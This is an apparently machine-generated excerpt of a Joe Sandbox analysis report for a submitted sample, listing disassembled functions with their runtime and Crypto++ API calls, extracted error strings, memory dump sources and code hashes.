                                                                                            • Part of subcall function 6D06AB70: __getptd.LIBCMT ref: 6D06AB8C
                                                                                          • __getptd.LIBCMT ref: 6D06BEC0
                                                                                            • Part of subcall function 6D06EAE6: __getptd_noexit.LIBCMT ref: 6D06EAE9
                                                                                            • Part of subcall function 6D06EAE6: __amsg_exit.LIBCMT ref: 6D06EAF6
                                                                                          • __getptd.LIBCMT ref: 6D06BECE
                                                                                          • __getptd.LIBCMT ref: 6D06BEDC
                                                                                          • __getptd.LIBCMT ref: 6D06BEE7
                                                                                          • _CallCatchBlock2.LIBCMT ref: 6D06BF0D
                                                                                            • Part of subcall function 6D06AC15: __CallSettingFrame@12.LIBCMT ref: 6D06AC61
                                                                                            • Part of subcall function 6D06BFB4: __getptd.LIBCMT ref: 6D06BFC3
                                                                                            • Part of subcall function 6D06BFB4: __getptd.LIBCMT ref: 6D06BFD1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                          • String ID:
                                                                                          • API String ID: 1602911419-0
                                                                                          • Opcode ID: a94c0e98cc74fb1e1aa979842c0074c99e09175d3ab8d82f04d57bfd3ac2b932
                                                                                          • Instruction ID: ada52eebf0e5bd3905d9f746b5a5c9944b63b1c3f0d0c63ad9ee25a30f70f8de
                                                                                          • Opcode Fuzzy Hash: a94c0e98cc74fb1e1aa979842c0074c99e09175d3ab8d82f04d57bfd3ac2b932
                                                                                          • Instruction Fuzzy Hash: A011F6B1C042499FEB00DFA4C944BEEBBB0FF44318F11846AFA14A7251EB789A109F60
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1768998212.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5cc0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HERE$HERE$LOOK$LOOK$p<^q$p<^q$Gvq
                                                                                          • API String ID: 0-792669839
                                                                                          • Opcode ID: 4f19855670a99998c84fcd0b2d11c3f2b4ba8bff2c255c45bff46abf27587e5e
                                                                                          • Instruction ID: 640a6a1ab47b6c8b59cb805dd1169cf56a046f49c157a53a869d336734347919
                                                                                          • Opcode Fuzzy Hash: 4f19855670a99998c84fcd0b2d11c3f2b4ba8bff2c255c45bff46abf27587e5e
                                                                                          • Instruction Fuzzy Hash: C5A18274E002298FDB64DF69C994BD9BBB1BB48310F1485E9D50DAB361DB349E81CF50
                                                                                          APIs
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D037267
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw
                                                                                          • String ID: exceeds the maximum of $ is less than the minimum of $: IV length
                                                                                          • API String ID: 2005118841-1273958906
                                                                                          • Opcode ID: 5e2cc546bc49d880b725e533f6c310a0bdc387ea0a0b734a0e3d764c5c595c85
                                                                                          • Instruction ID: 26e2647730f51db01cec584ea791804f1adc6e242221742644e0fcbc8b672903
                                                                                          • Opcode Fuzzy Hash: 5e2cc546bc49d880b725e533f6c310a0bdc387ea0a0b734a0e3d764c5c595c85
                                                                                          • Instruction Fuzzy Hash: 0261607110C381AFE321DB68C884FDFB7E9AF99304F054A1DE68D87242DB75990487A7
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: _strncmptype_info::operator!=
                                                                                          • String ID: ThisPointer:$ValueNames
                                                                                          • API String ID: 1333309372-2375088429
                                                                                          • Opcode ID: 011b429633d453447b6a33fd4943ec7124e6e173af0141e5e3aeeaf509a6aa5d
                                                                                          • Instruction ID: 61c90f2f29fc2f3f9ed6205eb928f190cc813f94873272c0011d53aa5e9fc53a
                                                                                          • Opcode Fuzzy Hash: 011b429633d453447b6a33fd4943ec7124e6e173af0141e5e3aeeaf509a6aa5d
                                                                                          • Instruction Fuzzy Hash: F051D3752083415BE314CFA5C990F37BBEAAF85348F144A1DF9DA8B292D722F8198761
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: _strncmptype_info::operator!=
                                                                                          • String ID: ThisPointer:$ValueNames
                                                                                          • API String ID: 1333309372-2375088429
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: _strncmptype_info::operator!=
                                                                                          • String ID: ThisPointer:$ValueNames
                                                                                          • API String ID: 1333309372-2375088429
                                                                                          APIs
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D041C1A
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D041CDE
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D041D3E
                                                                                          Strings
                                                                                          • TF_SignerBase: this algorithm does not support messsage recovery or the key is too short, xrefs: 6D041C67
                                                                                          • TF_SignerBase: the recoverable message part is too long for the given key and algorithm, xrefs: 6D041CF0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                                                          • String ID: TF_SignerBase: the recoverable message part is too long for the given key and algorithm$TF_SignerBase: this algorithm does not support messsage recovery or the key is too short
                                                                                          • API String ID: 3476068407-3371871069
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D00402A
                                                                                            • Part of subcall function 6D069125: std::exception::exception.LIBCMT ref: 6D06913A
                                                                                            • Part of subcall function 6D069125: __CxxThrowException@8.LIBCMT ref: 6D06914F
                                                                                            • Part of subcall function 6D069125: std::exception::exception.LIBCMT ref: 6D069160
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D004067
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D0690ED
                                                                                            • Part of subcall function 6D0690D8: __CxxThrowException@8.LIBCMT ref: 6D069102
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D069113
                                                                                          • _memmove.LIBCMT ref: 6D0040C8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
                                                                                          • String ID: invalid string position$string too long
                                                                                          • API String ID: 1615890066-4289949731
                                                                                          APIs
                                                                                          • ___BuildCatchObject.LIBCMT ref: 6D06C24E
                                                                                            • Part of subcall function 6D06C1A9: ___BuildCatchObjectHelper.LIBCMT ref: 6D06C1DF
                                                                                          • _UnwindNestedFrames.LIBCMT ref: 6D06C265
                                                                                          • ___FrameUnwindToState.LIBCMT ref: 6D06C273
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                          • String ID: csm$csm
                                                                                          • API String ID: 2163707966-3733052814
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memmove
                                                                                          • String ID:
                                                                                          • API String ID: 4104443479-0
                                                                                          APIs
                                                                                          • SafeArrayGetElement.OLEAUT32(?,?,4E8A916F), ref: 6D023C49
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D023C81
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D023D26
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D023D30
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D023D89
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$Clear$ArrayElementInitSafe
                                                                                          • String ID:
                                                                                          • API String ID: 4110538090-0
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Timetime$Sleep
                                                                                          • String ID:
                                                                                          • API String ID: 4176159691-0
                                                                                          APIs
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • _rand.LIBCMT ref: 6D016DEA
                                                                                            • Part of subcall function 6D069E0C: __getptd.LIBCMT ref: 6D069E0C
                                                                                          • std::exception::exception.LIBCMT ref: 6D016E17
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D016E2C
                                                                                          • std::exception::exception.LIBCMT ref: 6D016E3B
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D016E50
                                                                                            • Part of subcall function 6D069BB5: std::exception::exception.LIBCMT ref: 6D069C04
                                                                                            • Part of subcall function 6D069BB5: std::exception::exception.LIBCMT ref: 6D069C1E
                                                                                            • Part of subcall function 6D069BB5: __CxxThrowException@8.LIBCMT ref: 6D069C2F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8Throw$__getptd_malloc_rand
                                                                                          • String ID:
                                                                                          • API String ID: 2791304714-0
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(00000000,?,?), ref: 6D017761
                                                                                          • LeaveCriticalSection.KERNEL32(00000000,?), ref: 6D017782
                                                                                          • EnterCriticalSection.KERNEL32(00000018), ref: 6D017796
                                                                                          • LeaveCriticalSection.KERNEL32(00000018), ref: 6D0177CE
                                                                                          • QueueUserWorkItem.KERNEL32(6D031D50,00000000,00000010), ref: 6D01780C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$EnterLeave$ItemQueueUserWork
                                                                                          • String ID:
                                                                                          • API String ID: 584243675-0
                                                                                          APIs
                                                                                          • std::exception::exception.LIBCMT ref: 6D005ACB
                                                                                            • Part of subcall function 6D069533: std::exception::_Copy_str.LIBCMT ref: 6D06954E
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D005ABC
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D005AE0
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • std::exception::exception.LIBCMT ref: 6D005B18
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D005B2D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw$std::exception::exception$Copy_strExceptionRaise_mallocstd::exception::_
                                                                                          • String ID:
                                                                                          • API String ID: 921928366-0
                                                                                          APIs
                                                                                          • __getptd.LIBCMT ref: 6D06F047
                                                                                            • Part of subcall function 6D06EAE6: __getptd_noexit.LIBCMT ref: 6D06EAE9
                                                                                            • Part of subcall function 6D06EAE6: __amsg_exit.LIBCMT ref: 6D06EAF6
                                                                                          • __amsg_exit.LIBCMT ref: 6D06F067
                                                                                          • __lock.LIBCMT ref: 6D06F077
                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 6D06F094
                                                                                          • InterlockedIncrement.KERNEL32(05D01658), ref: 6D06F0BF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                          • String ID:
                                                                                          • API String ID: 4271482742-0
                                                                                          APIs
                                                                                          • __getptd.LIBCMT ref: 6D06F7C8
                                                                                            • Part of subcall function 6D06EAE6: __getptd_noexit.LIBCMT ref: 6D06EAE9
                                                                                            • Part of subcall function 6D06EAE6: __amsg_exit.LIBCMT ref: 6D06EAF6
                                                                                          • __getptd.LIBCMT ref: 6D06F7DF
                                                                                          • __amsg_exit.LIBCMT ref: 6D06F7ED
                                                                                          • __lock.LIBCMT ref: 6D06F7FD
                                                                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 6D06F811
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                          • String ID:
                                                                                          • API String ID: 938513278-0
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memcpy_s
                                                                                          • String ID:
                                                                                          • API String ID: 2001391462-3916222277
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memcpy_s_memmove_memset
                                                                                          • String ID: EncodingParameters
                                                                                          • API String ID: 4034675494-55378216
                                                                                          APIs
                                                                                            • Part of subcall function 6D05D820: _memmove.LIBCMT ref: 6D05D930
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D00402A
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D0413D4
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                            • Part of subcall function 6D038D80: _malloc.LIBCMT ref: 6D038D8A
                                                                                            • Part of subcall function 6D038D80: _malloc.LIBCMT ref: 6D038DAF
                                                                                          Strings
                                                                                          • for this key, xrefs: 6D041348
                                                                                          • doesn't match the required length of , xrefs: 6D041316
                                                                                          • : ciphertext length of , xrefs: 6D0412E4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: _malloc$ExceptionException@8RaiseThrowXinvalid_argument_memmovestd::_
                                                                                          • String ID: doesn't match the required length of $ for this key$: ciphertext length of
                                                                                          • API String ID: 1025790555-2559040249
                                                                                          • Opcode ID: 0e80a22668a13a4389766e0001764911613ea2dbf032fba65274194152976403
                                                                                          • Instruction ID: b88997801ed7dbfc38c5329d42e01610d1dd274d7dfdf58f2f5616187d00bed0
                                                                                          • Opcode Fuzzy Hash: 0e80a22668a13a4389766e0001764911613ea2dbf032fba65274194152976403
                                                                                          • Instruction Fuzzy Hash: 4BA14D7550C380AFE324CB69D880F9BB7E9AFD9304F458A1DE59D83251DB70A905CBA3
                                                                                          APIs
                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 6D06B50D
                                                                                            • Part of subcall function 6D071AA0: __87except.LIBCMT ref: 6D071ADB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorHandling__87except__start
                                                                                          • String ID: pow
                                                                                          • API String ID: 2905807303-2276729525
                                                                                          • Opcode ID: 8a92beed18226ea9d5ad450ae936a4afd600d770d3fbfb660803b8b70222462a
                                                                                          • Instruction ID: 3374429c10a42f5892e90e8da3cdbd1d0c485bc6f7603434a813450da78d0671
                                                                                          • Opcode Fuzzy Hash: 8a92beed18226ea9d5ad450ae936a4afd600d770d3fbfb660803b8b70222462a
                                                                                          • Instruction Fuzzy Hash: 6F518DA1E1C24396FB11AB18C9603BE7BF4EB42711F50DD59F5E44A1D4FF3484848A6B
                                                                                          APIs
                                                                                          • __cftoe.LIBCMT ref: 6D0188ED
                                                                                            • Part of subcall function 6D06A116: __mbstowcs_s_l.LIBCMT ref: 6D06A12C
                                                                                          • __cftoe.LIBCMT ref: 6D018911
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: __cftoe$__mbstowcs_s_l
                                                                                          • String ID: zX$P
                                                                                          • API String ID: 1494777130-2079734279
                                                                                          • Opcode ID: 97d72a63bf5dd27a5ae1ae3606755740fb4cd82e2087e67adae4e59220786e34
                                                                                          • Instruction ID: 7b0b64fd70a955047ae93eca95a1159e4126ab2e13f849ff81dfdd22a0c3f694
                                                                                          • Opcode Fuzzy Hash: 97d72a63bf5dd27a5ae1ae3606755740fb4cd82e2087e67adae4e59220786e34
                                                                                          • Instruction Fuzzy Hash: 75910FB110C7819FD376CF14C890BABBBE8BB88714F508A1DE19D4B281EB716645CF92
                                                                                          APIs
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D038ABB
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D038B82
                                                                                          Strings
                                                                                          • : invalid ciphertext, xrefs: 6D038B48
                                                                                          • PK_DefaultDecryptionFilter: ciphertext too long, xrefs: 6D038A8E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw
                                                                                          • String ID: : invalid ciphertext$PK_DefaultDecryptionFilter: ciphertext too long
                                                                                          • API String ID: 2005118841-483996327
                                                                                          • Opcode ID: 651456a941b6597234e51ca7ab8160ba00d3da3e8623b4c8f601afa8a6400bf7
                                                                                          • Instruction ID: 16f3582c1cd33899abcf2ca11f80c11446121d56c8e588e451787846f16af7bf
                                                                                          • Opcode Fuzzy Hash: 651456a941b6597234e51ca7ab8160ba00d3da3e8623b4c8f601afa8a6400bf7
                                                                                          • Instruction Fuzzy Hash: 4D515EB5108781AFE324CF54D990FABB7F8EF88704F014A5DE59A87641DB31E908CB62
                                                                                          APIs
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D00402A
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D036BA6
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D004067
                                                                                            • Part of subcall function 6D004010: _memmove.LIBCMT ref: 6D0040C8
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D036C56
                                                                                          Strings
                                                                                          • NullRNG: NullRNG should only be passed to functions that don't need to generate random bytes, xrefs: 6D036B33
                                                                                          • RandomNumberGenerator: IncorporateEntropy not implemented, xrefs: 6D036BE3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
                                                                                          • String ID: NullRNG: NullRNG should only be passed to functions that don't need to generate random bytes$RandomNumberGenerator: IncorporateEntropy not implemented
                                                                                          • API String ID: 1902190269-184618050
                                                                                          • Opcode ID: 7df33e4a9fd4535bf9099938afe89e1acd133083e13dac092db27e1ff9ca1888
                                                                                          • Instruction ID: 3f37eb0630924384616229c557f642a63d4158d2b796254d3c498b5c78403bce
                                                                                          • Opcode Fuzzy Hash: 7df33e4a9fd4535bf9099938afe89e1acd133083e13dac092db27e1ff9ca1888
                                                                                          • Instruction Fuzzy Hash: 8F5112B110C780AFE300DF69C880B5BFBE8BB99754F504A2EF19997291D7B4D908CB56
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D004EFC
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D004F16
                                                                                          • _memmove.LIBCMT ref: 6D004F6C
                                                                                            • Part of subcall function 6D004D90: std::_Xinvalid_argument.LIBCPMT ref: 6D004DA9
                                                                                            • Part of subcall function 6D004D90: std::_Xinvalid_argument.LIBCPMT ref: 6D004DCA
                                                                                            • Part of subcall function 6D004D90: std::_Xinvalid_argument.LIBCPMT ref: 6D004DE5
                                                                                            • Part of subcall function 6D004D90: _memmove.LIBCMT ref: 6D004E4D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                          • String ID: string too long
                                                                                          • API String ID: 2168136238-2556327735
                                                                                          • Opcode ID: bc5821ae5335aa1cee2bc9452ff4d02ccc701781701bcd7dc3f79000ea124cdc
                                                                                          • Instruction ID: 3791d1e0adc7ddd369f53f51fe6b16e4f2bdaf0aa1ef0e15aeb6f59127be9931
                                                                                          • Opcode Fuzzy Hash: bc5821ae5335aa1cee2bc9452ff4d02ccc701781701bcd7dc3f79000ea124cdc
                                                                                          • Instruction Fuzzy Hash: A93104323106507BF7249E5DA480B7EF7EAEFED620B60492FE25587681C771D84483A9
                                                                                          APIs
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D00402A
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D00211F
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D004067
                                                                                            • Part of subcall function 6D004010: _memmove.LIBCMT ref: 6D0040C8
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D0021BF
                                                                                          Strings
                                                                                          • PK_MessageAccumulator: TruncatedFinal() should not be called, xrefs: 6D00215D
                                                                                          • PK_MessageAccumulator: DigestSize() should not be called, xrefs: 6D0020BD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
